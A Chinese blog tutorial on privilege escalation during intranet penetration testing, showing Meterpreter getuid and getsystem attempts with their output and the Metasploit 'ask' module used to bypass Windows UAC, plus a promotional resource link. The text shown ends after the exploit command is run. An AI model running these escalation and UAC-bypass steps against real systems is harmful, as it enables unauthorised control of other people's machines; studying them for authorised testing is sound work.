【网络安全】内网渗透(二):权限提升

本文介绍了内网渗透测试中提升系统权限的方法,包括查看用户权限、尝试提权、利用ShellExecute绕过UAC、使用bypassuac模块绕过UAC以及利用提权漏洞如ms14_058_track_popup_menu。同时,文章也关注了网络安全领域的就业现状和学习资源。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

本博文仅供学习使用,请勿他用!!!

网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现;

上篇博客获取到系统权限后,本文将会介绍如何提升获取到的系统权限,主要通过三种方式:提高程序运行级别,UAC 绕过,利用提权漏洞进行提权;

提高程序运行级别

1、查看当前的用户权限 getuid

meterpreter > getuid
Server username: WIN-50HM5UIKP60\sid10t

2、尝试提权 getsystem,这种成功的概率极小,果然报错了:

meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

3、把当前会话挂起 background,然后启用模块 use exploit/windows/local/ask,可以先通过 info 来查看一下这个模块的功能:

This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. 此模块将尝试使用 ShellExecute undocumented RunAs 标志来提升执行级别,以绕过低 UAC 设置。

4、设置模块的一些属性:

  • FILENAME:弹出 UAC 显示的文件名;
  • PATH:文件路径;
  • SESSION:选择会话的 ID;

设置完属性之后,就开始攻击 exploit

msf exploit(ask) > set session 2
session => 2
msf exploit(ask) > set filename sid10t.exe
filename => sid10t.exe
msf exploit(ask) > exploit 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值